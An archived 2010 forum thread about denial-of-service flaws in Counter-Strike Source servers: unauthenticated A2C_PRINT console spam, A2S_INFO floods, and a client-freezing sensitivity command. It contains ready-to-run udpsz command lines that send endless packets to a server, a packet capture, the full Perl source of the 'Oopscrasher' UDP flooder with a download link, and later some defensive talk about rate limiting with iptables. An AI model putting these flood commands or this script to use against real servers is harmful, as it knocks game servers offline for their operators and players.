Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:27

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 
Author Message
 Post subject: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 05 Jan 2010 03:05 

Joined: 18 Apr 2008 10:28
Posts: 36
When you change the sensivity value in the game

for ex:
sensivity 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
the game freezes and all my computer get stuck
so if I got and admin and do execall (typing commands on the server clients console)
all the computers of them get stuck

as I read, its call the teleport bug.

and aluigi how I can send udp packet to counter strike source server?

for using:

A2C_PRINT Spam (The Bell Bug that you talking about (I think))
SRCDS does not do any sort of authentication on A2C_PRINT messages. This means that anyone can print messages to the servers console, simply by sending UDP packets. It seems this is a legacy feature, and is not actually used by anything. Valve has been notified, and doesn't see this as a problem.

A2S_INFO Spam
If large numbers of A2S_INFO packets are sent at the server, the FPS will severely drop, making the server essentially unplayable. Since these packets can be spoofed, rate limiting one IP is fairly useless


Top
 Profile  
 
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 05 Jan 2010 04:49 

Joined: 11 Nov 2009 01:07
Posts: 7
ah but you see this has already been turned into several malicious tools, for example:

oopscrasher
german crasher
deviance crasher

the fix is simple and located here:

https://forums.alliedmods.net/showthread.php?t=95312


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 05 Jan 2010 17:47 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
the packets that don't require other packets before them to work (so no auth/login/challenge-response/handshake) can be sent simply with my udpsz tool:
http://aluigi.org/testz.htm#udpsz

example for A2C_PRINT (shows "aaa"):
udpsz -C ffffffff6c616161 SERVER 27016 -1
udpsz -b a -C ffffffff6c SERVER 27016 1000

example for A2A_ACK:
udpsz -C ffffffff6a SERVER 27016 -1

add the -l 10 option for testing the sending of one packet each 10 milliseconds, and you will see that the server automatically bans the IP of the client that is causing the problem.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 10 Jan 2010 22:54 

Joined: 14 Jul 2009 18:38
Posts: 13
If you're going to copy and paste text off my page, you could at least include the fixes.. http://code.devicenull.org/index.php?ti ... 2_Exploits


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 06:04 

Joined: 01 Jun 2010 05:58
Posts: 18
I wrote a little poc of this myself, also i tryed udpsz -l 1 -b a -C ffffffff6c SERVER PORT -1
It sure fills the serverconsole with a2c_print stuff, but i dont see it lagging the server or even crashing it.

Any news on this one? Is it fixed or do i have to protect my servers?

-------
Edit:

I got my hands on this Oopscrasher sabados mentioned, but i dont see this one "exploiting" the a2c_print flaw.
It sure laggs the Server as hell, but to be honest i cant tell why.
Heres one of the packets it sends

Code:
0000   00 1a 4f fe 07 1d 00 1b fc f5 ce 5e 08 00 45 00  ..O........^..E.
0010   00 2e 01 6c 00 00 80 11 ca e3 c0 a8 03 1d 55 55  ...l..........UU
0020   55 55 08 af 69 87 00 1a 50 71 33 42 45 21 6f 64  UU..i...Pq3BE!od
0030   79 36 53 41 4d 50 42 45 21 64 69 69              y6SAMPBE!dii


So it basicly just spammes the server with
Code:
\x33\x42\x45\x21\x6f\x64\x79\x36\x53\x41\4d\x50\x42\x45\x21\64\x69\x69
which translates to
BE!ody6SAMPBE!dii


Regarding to http://developer.valvesoftware.com/wiki/Server_queries
any packet to a source server should start with \xff\xff\xff\xff
So this one clearly does not.
You will also notice its written for SAMP (A GTA San Andreas Multiplayer MOD).

Is it just the pure ammount of traffic to the server that laggs it?
That would mean you basicly just have to generate alot of traffic to the server, no matter whats in the packets.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 15:23 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
as expected the endless sending of that "3BE!ody6SAMPBE!dii" string has no effect (untouched cpu and ram usage) versus my local css and tf2 server because that one is not a packet handled by the game.
remember also that the only way to test the effect of "something" is from another client and not the same pc from which you are sending the packets.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 17:25 

Joined: 01 Jun 2010 05:58
Posts: 18
aluigi wrote:
as expected the endless sending of that "3BE!ody6SAMPBE!dii" string has no effect (untouched cpu and ram usage) versus my local css and tf2 server because that one is not a packet handled by the game(...)

That's what i thought should happen, but...

http://85.131.170.109/neo/logs.jpg

This is a CSpromod server (basicly CS:S) running on a linux debian root.
I might test it with as CS:S server when i got the time to set one up, but im pretty sure the effect will be the same.

My friend in Teamspeak verified that the Server was lagging.
Also heres the source of Oopscrasher i found in the wild.

Code:
Socket::INET;
print "--------OopsIDied's SAMP Server Crasher----------\n";
print "Enter the host IP.\n";
$owned = <STDIN>;
print "Enter the host port.\n";
$port = <STDIN>;
print "Enter the number of attacks to send.\n";
$limit = <STDIN>;
chomp $limit;
chomp $owned;
chomp $port;
if($owned =~ /64.85.162.42/ || $owned =~ /71.113.132.21/){
print "Sorry, don't want to crash NR or Fackin lol.\n";
exit();
}
$sock=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>"$owned")||die("Owned");

$attack= qw(I,]E'c@3OC+
3BE!ody6SAMPBE!dii);
$x = 1;
until($x==$limit){
$sock->send($attack);
$sock->send($attack2);
print "Attack $x sent.\n";
$x++;
}


I noticed the String in the source is "qw(I,]E'c@3OC+3BE!ody6SAMPBE!dii)" i dont know why in the Wireshark capture only "3BE!ody6SAMPBE!dii)" showed up...

If you want to test it for yourself heres the copy of Oopscrasher i used: http://85.131.170.109/neo/OopsCrasher.zip


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 17:45 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
in that case it means it's just CSS that can't handle too much consecutive packets, which is enough strange for a similar type of game but it's in line with the words of various people that used my udpsz tool for causing this type of lag (search udpsz 55555 on google).
really weird.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 18:53 

Joined: 01 Jun 2010 05:58
Posts: 18
You think there's any chance of blocking something like this, maybe some iptable rule on linux?
As far as i know these sourcemod anti dos plugins only blocking a2c_print and a2s_info correct me if im wrong.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 19:40 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
it's enough problematic to filter a flooding of packets, first because they can be spoofed (although only skilled people can do it) and then because the only way is building a per-IP check which means tracking each IP... definitely a boring thing that consumes enough resources.
for example I was thinking to a work-around like checking only the amount of packets from the last IP and the elapsed times, something like if you receive more than 5 packets from the last IP within 100 ms then ban it via iptables, anyway are only random thoughts


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 20:29 

Joined: 01 Jun 2010 05:58
Posts: 18
By "skilled" you talking about using raw sockets to change the packets header? Well, in that case i know some skilled people ;)
I hoped there where some magic linux iptable command to ban an ip if it send more then, 5packets within 100ms.
Looks like we have to hope for the best...

Thanks for your thoughts and see you around.


Top
 Profile  
 
 Post subject: Re: Counter Strike Source Mouse Sensivity Bug!
PostPosted: 01 Jun 2010 20:40 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
with "skilled" I mean that one and obviously the practical possibility of doing it, because nowadays with routers and NATs it's no longer as in the past (the good old computer with public IP address ih ih ih).
anyway could exist something linux specific to avoid a similar flooding of packets, but I don't have something to suggest.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 12 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
cron